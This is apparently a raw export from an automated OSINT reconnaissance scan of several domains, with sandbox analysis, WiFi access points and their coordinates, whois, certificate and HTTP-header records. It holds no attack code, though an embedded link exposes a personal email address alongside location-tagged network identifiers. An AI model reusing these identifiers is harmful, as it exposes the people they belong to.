https://threatjammer.com/info/46.101.229.70 | 46.101.229.70 |
| 2023-05-12 02:46:16 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Microsoft subsidiaries | battleb0t.github.io |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | dvdbeyond (Net ID: 00:01:24:F2:B3:12) | 37.7813933,-122.3918002 |
| 2023-05-12 02:49:20 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://eur02.safelinks.protection.outlook.com/?url=https%3A%2F%2Fotmanmarzouki.github.io%2FOtmans-Portfolio.github.io%2F&data=05%7C01%7Cmthiele%40merentis.com%7C299f2bd8deee47ffe3d608db19275c5b%7Ccf9329a22e9a41bebe5cca40f384186d%7C0%7C1%7C638131429069465359%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000%7C%7C%7C&sdata=pgeJVhV%2BRZasovsRpk6OiFgUM9uQNEWW2WY87NVwEIw%3D&reserved=0', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2852"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b24_IE_EarlyTabStart_0xd98_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b24_ConnHashTable<2852>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b24_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b24_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "IsoScope_b24_IESQMMUTEX_0_519"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.47.11.28:443"\n "185.199.110.153:443"\n "142.251.32.42:443"\n "172.217.12.99:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"eur02.safelinks.protection.outlook.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"* Copyright 2011-2015 Twitter, Inc." (Indicator: "twitter")\n ".icon-paypal:before {" (Indicator: "paypal")\n ".icon-social-twitter-circular:before {" (Indicator: "twitter")\n ".icon-social-twitter:before {" (Indicator: "twitter")\n ".icon-twitter2:before {" (Indicator: "twitter")\n ".icon-youtube2:before {" (Indicator: "youtube")\n ".icon-youtube:before {" (Indicator: "youtube")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "MPBOXG78.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\MPBOXG78.txt]- [targetUID: 00000000-00002852]\n "RecoveryStore._243EC491-BE5E-11ED-ADB6-080027BE1525_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "main_1_.js" has type "ASCII text"- [targetUID: N/A]\n "otmanmarzouki.github_1_.xml" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "V45LK95K.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\V45LK95K.txt]- [targetUID: 00000000-00002852]\n "IIHN9FBJ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\IIHN9FBJ.txt]- [targetUID: 00000000-00002852]\n "icomoon_1_.css" has type "ASCII text"- [targetUID: N/A]\n "Otmans-Portfolio.github_1_.htm" has type "HTML document UTF-8 Unicode text"- [targetUID: N/A]\n "~DF82FC8B03F5CB359A.TMP" has type "data"- Location: [%TEMP%\\~DF82FC8B03F5CB359A.TMP]- [targetUID: 00000000-00002852]\n "6xK-dSZaM9iE8KbpRA_LJ3z8mH9BOJvgkBgv58a-xA_1_.woff" has type "Web Open Font Format TrueType length 16440 version 1.1"- [targetUID: N/A]\n "~DF0C1A02793FB6D845.TMP" has type "data"- Location: [%TEMP%\\~DF0C1A02793FB6D845.TMP]- [targetUID: 00000000-00002852]\n "animate_1_.css" has type "ASCII text"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "css_2_.css" has type "ASCII text"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "OTIZE8VE.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\OTIZE8VE.txt]- [targetUID: 00000000-00002852]\n "jquery.easing.1.3_1_.js" has type "UTF-8 Unicode text"- [targetUID: N/A]\n "~DFC4D5F15611D45BBD.TMP" has type "data"- Location: [%TEMP%\\~DFC4D5F15611D45BBD.TMP]- [targetUID: 00000000-00002852]\n "nuFvD-vYSZviVYUb_rj3ij__anPXJzDwcbmjWBN2PKdFvXDXbtU_1_.woff" has type "Web Open Font Format TrueType length 23764 version 1.1"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://www.iec.chIEC"\n Pattern match: "http://getbootstrap.com"\n Pattern match: "http://modernizr.com/download/#-fontface-backgroundsize-borderimage-borderradius-boxshadow-flexbox-hsla-multiplebgs-opacity-rgba-textshadow-cssanimations-csscolumns-generatedcontent-cssgradients-cssreflections-csstransforms-csstransforms3d-csstransitions-a"\n Pattern match: "http://gsgd.co.uk/sandbox/jquery/easing/"\n Pattern match: "https://github.com/twbs/bootstrap/blob/master/LICENSE"\n Pattern match: "https://github.com/nickpettit/glide"\n Pattern match: "https://github.com/imakewebthings/waypoints/blog/master/licenses.txt*/!function(){use"\n Pattern match: "jquery.org/license"\n Pattern match: "github.com/necolas/normalize.css"\n Pattern match: "https://github.com/h5bp/html5-boilerplate/blob/master/src/css/main.css"\n Pattern match: "http://www.w3.org/2000/svg},s={},t={},u={},v=[],w=v.slice,x,y=function(a,c,d,e){var"\n Pattern match: "https://fonts.googleapis.com/css?family=Quicksand:300,400,500,700"\n Pattern match: "https://github.com/Otmanmarzouki/ReactNativeAPP"\n Pattern match: "https://fonts.googleapis.com/css?family=Playfair+Display:400,400i,700"\n Pattern match: "http://daneden.me/animateLicensed"\n Pattern match: "https://fonts.gstatic.com/s/playfairdisplay/v30/nuFRD-vYSZviVYUb_rj3ij__anPXDTnCjmHKM4nYO7KN_qiTXtHA_w.woff"\n Pattern match: "https://fonts.gstatic.com/s/quicksand/v30/6xK-dSZaM9iE8KbpRA_LJ3z8mH9BOJvgkKEo58a-xA.woff"\n Pattern match: "MUID14C9D52949456EC70EC6C7E648096F31msn.com/10258419353603109809065333609631019627*"\n Pattern match: "http://daneden.me/animate"\n Heuristic match: "eur02.safelinks.protection.outlook.com"\n Pattern match: "https://otmanmarzouki.github.io/Otmans-Portfolio.github.io/Accept-Language"\n Heuristic match: "GET /Otmans-Portfolio.github.io/ HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateDNT: 1Connection: Keep-AliveHost: otmanmarzou"\n Pattern match: "Otmans-Portfolio.github.io/css/animate.css"\n Pattern match: "Otmans-Portfolio.github.io/css/bootstrap.css"\n Pattern match: "Otmans-Portfolio.github.io/css/fonts/icomoon.eot?6py85u"\n Pattern match: "Otmans-Portfolio.github.io/css/fonts/icomoon.ttf?6py85u"\n Pattern match: "Otmans-Portfolio.github.io/css/fonts/icomoon.woff?6py85u"\n Pattern match: "Otmans-Portfolio.github.io/css/icomoon.css"\n Pattern match: "Otmans-Portfolio.github.io/css/style.css"\n Pattern match: "Otmans-Portfolio.github.io/fonts/flaticon/font/flaticon.css"\n Pattern match: "Otmans-Portfolio.github.io/fonts/icomoon/icomoon.eot?srf3rx"\n Pattern match: "Otmans-Portfolio.github.io/images/AppMobile.jpg"\n Pattern match: "Otmans-Portfolio.github.io/images/otman.jpg"\n Pattern match: "Otmans-Portfolio.github.io/js/bootstrap.min.js"\n Pattern match: "Otmans-Portfolio.github.io/js/jquery.countTo.js"\n Pattern match: "Otmans-Portfolio.github.io/js/jquery.easing.1.3.js"\n Pattern match: "Otmans-Portfolio.github.io/js/jquery.min.js"\n Pattern match: "Otmans-Portfolio.github.io/js/jquery.waypoints.min.js"\n Pattern match: "Otmans-Portfolio.github.io/js/main.js"\n Pattern match: "Otmans-Portfolio.github.io/js/modernizr-2.6.2.min.js"\n Pattern match: "https://csp.withgoogle.com/csp/apps-theme | 185.199.110.153 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 1#########123x&&56########12X4& (Net ID: 00:02:2D:BC:46:55) | 34.0544, -118.244 |
| 2023-05-12 02:54:23 | Web Content | No | Web Spider | 3 | 0 | 5 | 0 | None | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f60726fad1912')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=KlbaNJzGw77sVIKMODL.ADC4FpZJphIcqM52Ij1fyiw-1683860063-0-gaNycGzNChA" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="kO2xNaAYVVwzudN_grHGsSAbBGIYi5Rp9eWkwq8bobk-1683860063-0-AQEme0OuFvC27LD-nLe2jrmTTnxOgSGtlJ79kOqNI8O_bMBUHsCUifsyrQtE2Qw_5-G3wZLVyXKSq4HyXvLjyCiAdaCGs4Ok-COq8gyypPok4HyuqEcnabkOPj9JKzn7fzxQf8pA4avsXNbgzL5RFZ0OappR_ENyOliTj3y1usOCEfdx0Qw-4NtIYkgBrlm6HYt1w2WiYgJIzvrwK3xMFits_Ebjt14epXfZCroTuFIFxaYyyRcuJJEK3ck04c2JtRdR99xcpwbep8NMi6CNOGP-aAH4FLQSKV1p7HK0fEmUDFvoadw-7bo2EucRyXYFLEbjS7Z_OKl0Srfy1Vim3Z_jqewduFNgcp1B-ir-aT25S4z2lvk1aBpRpS3Fpn4bKR_T7uQSek6SD4z_I81JUPCm-TbJt2WcAviPmmrfZDtigYqwaDeqh4Pqa29XowW1l1nnKs6qCFhQeaLuigzJf9PhtuPk6Ts6nn4TNWVyl9ze9NMDXt3HC-u5rh_1KxQxsTY_4JhB1jT5PYZQMJUvzkddK2MPm_CtJJRmvzu4A8h1xyRkeTxVWjg5p76zqZFKP8HOoZP1u7GkAK20kE8vR-O-Gy6CmmKj5hSdpF5vjt71wmiC0vDCk1rDRhhcEkt92S6uijW7cxkpckY78siJqFhpHOVFodJroZuf7HFMwvosFXQ5NGYyHEQXXlmkoclMMK3rVJNdxiIstjCLFnDxNsbd1epvptoA5TGFKFTmHs6QjRzTIv_BIuw1QORH1eUHK9O9N-txmFD1IbLACf92gVKiwNsAAtrRtW2F06n6d9Vs_GXVIbPcV6cwsJdIquww9NaI78ELNHJNq1J_tTdFxBZavYogbVnqkQFRmkO2l5VXSM6E9dcoOwi5q4qHSrZmlxJHiqDY-PKE8PDBSk8akurNHoBfBjtw2_a1RfC_lu8B7yXfZ1SNiql9epxt9-xA01ZEs-JXEIWKB7DVUehYb7RiTKZ_trIoGgh7Q6yEfeLCDTtC1yC2iiOVhPkX_h4Qfaf7LfPKruh9cjrbe0r7qMb0h8bIRy1fsQXVXXjhWHUJzLPbbOWh7F_0GW3qFusmjdR_P6sJL-gXtd5koZkzn6EK_YdKJO6jY9uPxr4sRnkK0ioS_0VfK7kQax3cDEA5YcxYvkmmBl4DMVhT7ISnmS5G8dSMhHOdJpbJMK5G9qQm8E9Nux-WgwCPgj6TkAmQMz1NenXnJJdqz-irhHABa_tynmZ1IPtBtnIPWbu4Mgp5VyNXvvUpfdGX7V6s-SjMtH9NRG3i4YZDcDp72B0EVaiT4n2jNeEilDlbVLw8k42_nwTD7Pw7hKXZpTyQQZntWW5wgIly7x0dOOWeJl6TsZIiDLpQjNv-mLX_xQzZHdw5kii58Ccy2XJ4npuVEuBraZJ9n6B2-5AwWyV3Qr3DTuk5PmfcIxKTr_u7HsbpdFR4FKp9wurJ9rvdDIpbL_yKOtyqM9yLjxeOpIdNG7zFw8AT7XqbUfz26ewFlzRX_Cc5FOV6ATYROS3OVpko2KV-NVpYQTJgT-fYvExK0W6Ze5BMg7wpM4RSZGt0EBF4MTRkHZYYHYqVG2Gs4Dr0KphCmDsWmTYs-Wp4YmyX8zHXt6eDU7SHKTxfT3pFaOqsKIwmwk1FnA5ZOhkDp5FB4KDNaO4UI8hC2NqGaVRdddker5xFPIyxy6_xtT-933_JQEm4Yo3p33SKpnr5oZLDUmiFpcGiocX8E23z9qF6KzqiLjSYYuEdSQjfT3AOVajEAM3LV2cJ-Yfb6qV1mYvKIEbYataggM_S7XSDOMFwSxuBJJhFB_YuSQY42F1bw3h-Wr_txcqos6CYojszcuJZzN7ZQwVv-pfKRrZP1vW37Ji7qXYRsXGXizVLTDb80myaduEuuPiE3j_iEUTMQHyX7FS77GwsNXMOnK-SOX4LESTyuge5gQCwNBG5LYbWqG1phc6ZBmjChX4XXPYEWTd6pqzDCahUeE-UBjC440QhIoggi4SFzrJT424_2pz3I1Z7K9v14oR0ixYp8X0YQSjX1TvMb1hvE05cdAoJpi9QPGYD511Yvrjtr2-nQRWT9vJBLGPT61xgS5JvfKWkR5mzvNMNLXnN-QaI-YMwAUvPR8sObbMc6Js74f0zl0__XqC1L4ZGx1B6W2mPRUMY1Lrg2rh8ki2L2eiGI4MSaqbVecE9vJyl6XPRcjgNKIcsC-zohWzf7sSDfofcLJcUO1xeUIJMC_3B3JBlhmMy_ukD9DKdx40muRRW18iGtfkoFnEyb5ylZEa9Cy6RH0tiulb9zDYu9lBPk43UYKuS0gITgFj7t6HoYRbYh8Mhdn_KQTmpy5fsQY55ZC7EUgiiqGZ2kxox4gPzr-qiw2zxNU0kuoof8T7V06bM_gPceZS49qqZ0qEgovgoUQEY1PrObCR2N_zXcey5RpH4biNXy5X3XHfa8DJrozVWuJVN7xKblnML0zEboEJxIy0gm8PmeTSLtq0S2uPc6VyK0a0Z4v1q4hj82ek">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'www.ayhu.xyz',
cType: 'managed',
cNounce: '64193',
cRay: '7c5f60726fad1912',
cHash: '710742417ab72e7',
cUPMDTk: "\/?__cf_chl_tk=KlbaNJzGw77sVIKMODL.ADC4FpZJphIcqM52Ij1fyiw-1683860063-0-gaNycGzNChA",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly93d3cuYXlodS54eXov',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'EHiPHm0Nl3GyThu9m1wbXjiHVtOqC3bOZB5NH6FZ4WpN/ont8bhxVwykMxIfoGSCjD8SpsL131biQUzVmplSkmz36+Rbm6LpKDPgFi1SZ6sdv468aKRPGhyFreJfGyRxilqUy5qO2EhnuYwrJjSxEU6DGEUFnqpvxw46fNgsaBRKOJ+bUVrPyznWm3WWDmCZ5I4ByfgFEH/V+llAilan1spVCzgSbbNaZnK7v2zKybgKpcf37StU8tcqkL0luzxFnWpTYEMJIRNh3502IKGm2GeIGVQUP6IIgH3pam7apk2jk/MVIAQ55tOJt6IZrTr1Qcj4biXsY3FIPVNAc0sCXlUyI683VVNAnv7kxmJ0SLq0ELP7CILJKsuRkOc2+1w90SBLDbAqCH/GEPeh86EVOXxwcNFZqRIljefJbQxhuH4JevbkysQYXa6LkLXsD5QKQE0OPjJQvEC2SmVFUO8wuJE/HZ29m2obUyVypKKxYzEuV7pCj1nVwt32aW4bF0deBcy4/M4CeO4Epb9dj4xmVGUtKMp/g+OZaEvQnjUgBRlg57NTUuvDL1hFtL478NEE',
t: 'MTY4Mzg2MDA2My4xMDMwMDA=',
m: 'Eo2K0b1/t+yBaonJiJkwi8mL0OupY28MY+kXkSexuGA=',
i1: 'WdeoMAtxqx1knlB7AiLouA==',
i2: 'PLvf+P/FOv6sb4wuUck9Eg==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'fqLp1aUJ26MbHPQQbwfAUprhzy4RljM1W5Ogim1le2Q=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f60726fad1912');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f60726fad1912';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=KlbaNJzGw77sVIKMODL.ADC4FpZJphIcqM52Ij1fyiw-1683860063-0-gaNycGzNChA" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
| https://www.ayhu.xyz/?__cf_chl_f_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU |
| 2023-05-12 03:25:40 | Similar Domain - Whois | No | Whois | 0 | 0 | 2 | 0 | None | % Restricted rights.
%
% Terms and Conditions of Use
%
% The above data may only be used within the scope of technical or
% administrative necessities of Internet operation or to remedy legal
% problems.
% The use for other purposes, in particular for advertising, is not permitted.
%
% The DENIC whois service on port 43 doesn't disclose any information concerning
% the domain holder, general request and abuse contact.
% This information can be obtained through use of our web-based whois service
% available at the DENIC website:
% http://www.denic.de/en/domains/whois-service/web-whois.html
%
%
Domain: ayhu.de
Nserver: sl1.sedo.com
Nserver: sl2.sedo.com
Status: connect
Changed: 2022-11-14T12:13:16+01:00
| ayhu.de |
| 2023-05-12 03:23:25 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.8:80 | 188.114.96.0/24 |
| 2023-05-12 02:50:15 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | files.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:b9:dc:49:67:68:c5:fe:31:cf:92:a4:a3:f2:91:5a:dc:15
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 2 19:07:11 2023 GMT
Not After : Apr 2 19:07:10 2023 GMT
Subject: CN=files.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:e4:bb:72:24:9a:3b:f5:c0:b6:00:b2:9e:75:64:
a2:c5:05:47:75:ee:45:0a:c4:64:a2:83:f0:3f:73:
63:b5:70:6c:7f:e6:38:41:f0:ce:48:1b:e9:cb:50:
e5:db:9b:1e:52:33:00:08:50:9b:48:a3:21:b1:72:
aa:97:ba:07:58:22:50:7b:e0:2e:66:ce:83:70:77:
e2:36:f5:0e:13:40:a0:5f:8e:ab:d5:28:a5:4a:11:
32:bf:f0:01:46:1e:7f:2c:f4:2c:07:22:93:45:a7:
52:4d:66:5a:2e:a0:5e:1d:49:67:6d:93:3c:d4:e7:
67:ac:0d:eb:84:c4:ad:1c:c6:3a:c8:a3:8e:b1:df:
54:8a:52:1f:ab:aa:01:49:57:78:fa:b6:5c:77:ae:
0a:d5:12:86:cb:ea:c3:13:b3:1e:aa:59:f3:df:50:
ef:11:40:b8:bb:45:d3:4e:d6:8e:bd:f2:33:ae:52:
06:ca:88:01:72:31:4f:46:00:bf:98:93:9a:2f:f8:
47:9a:87:b9:a0:cb:d1:a8:89:43:66:4d:f6:54:8d:
cf:4c:31:d7:d0:0d:e1:33:7b:c6:0e:1d:4a:3f:9a:
c4:dd:c7:68:08:e6:6f:b9:26:6c:49:f2:5f:ad:59:
da:74:03:6e:20:eb:9a:d2:3d:fb:bc:79:34:c6:43:
38:6b:71:f9:76:22:a0:ca:93:2e:c8:20:b0:a5:40:
b2:06:05:e9:aa:de:b1:b0:40:d3:fa:2b:db:3c:b4:
82:d4:58:96:b7:bc:70:be:ac:1c:cb:fc:f4:c1:71:
31:c2:05:84:ce:b2:c9:8b:1e:36:fd:72:15:79:33:
62:66:31:a9:1f:5f:76:ce:5e:82:a3:20:7b:a6:f9:
68:6f:ff:65:d5:4b:45:ed:7b:6b:c9:7e:38:35:b0:
ed:10:1d:cb:42:25:ea:6d:e6:42:50:4c:82:d7:21:
2e:ac:aa:6c:ee:6b:f7:e1:58:64:07:26:55:c1:2f:
e6:5e:f4:d7:f0:f0:f1:80:c4:a5:9f:c7:96:10:6f:
58:39:48:6a:55:ca:52:01:6a:3b:90:48:bc:27:e3:
bb:2e:83:ea:d3:dc:20:53:21:0d:af:34:82:fc:9f:
4c:d4:4a:b7:14:07:01:bb:2c:76:8e:22:ed:cd:33:
84:b4:42:01:5f:9f:c6:60:56:3d:e0:bb:bf:10:3f:
42:ca:65:31:ce:e9:5e:a4:e2:24:f7:ab:0e:d3:ce:
0e:6d:01:e6:42:c0:05:7f:8e:8b:85:68:57:f5:6c:
ca:7f:14:f3:74:ac:f1:ad:74:c5:8e:20:02:20:df:
19:4d:31:07:4a:75:45:cf:f0:a5:0c:ad:70:b3:f4:
12:1c:8b
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
CF:FE:0F:FB:EC:E3:E9:7B:CF:AB:EA:49:61:6D:B0:C0:A0:EB:11:BC
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:files.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
a4:32:cf:fb:d0:39:6f:82:9d:3d:67:37:3f:48:f2:83:df:47:
98:e5:77:f3:9a:cd:58:51:2e:5a:16:d2:ce:bc:15:65:21:f4:
b5:cd:b9:a9:fc:60:96:b4:37:b9:74:53:b0:08:d4:20:ed:ae:
46:30:5b:a1:40:1f:06:63:e8:b7:fd:a2:ae:46:43:12:c8:ec:
2c:fa:7e:4b:40:c3:e4:67:1b:d3:d7:35:70:63:9c:ea:59:e2:
5e:8f:9c:90:71:11:63:91:74:8d:0a:52:eb:ba:46:9f:f2:39:
5e:39:b2:09:76:41:0d:cb:d5:f3:3a:f2:81:99:14:13:be:9e:
11:ee:36:84:20:eb:dd:4f:6f:09:26:c0:62:74:10:aa:4d:74:
78:55:cd:0b:48:ce:19:77:6a:83:ea:d3:9f:49:7a:b9:c9:a9:
5b:95:9e:95:d8:54:4a:32:2e:c5:80:7d:32:ed:ad:ce:47:be:
97:bd:cb:d5:bd:1a:9f:ae:43:9a:14:6a:a0:5c:07:02:ab:55:
27:d1:6c:76:e5:b8:24:cd:b9:7c:e4:e2:4c:26:e7:40:31:8a:
19:ba:6f:75:c4:40:35:3a:93:76:52:b7:ca:0b:0f:f0:2a:8f:
ea:7f:1f:0f:0d:e6:80:25:29:5f:a8:34:cc:8b:fd:62:68:85:
22:2f:1a:a7
|
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 6 | 0 | None | cross-origin-opener-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=A6pUH5BrVxAUHCFyEeZi9CXof2Qs7NDG4lIwx2vXWTr3bfLmD6TvAbu9CC5NAPxdf7YdVt%2FA3H1mkzjba6JtFsZlXS70vO%2B%2Fyr5MWISSAsLD5ovFUcdhiD4vPP8ctfc%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60726fad1912-EWR", "cross-origin-opener-policy": "same-origin"} |
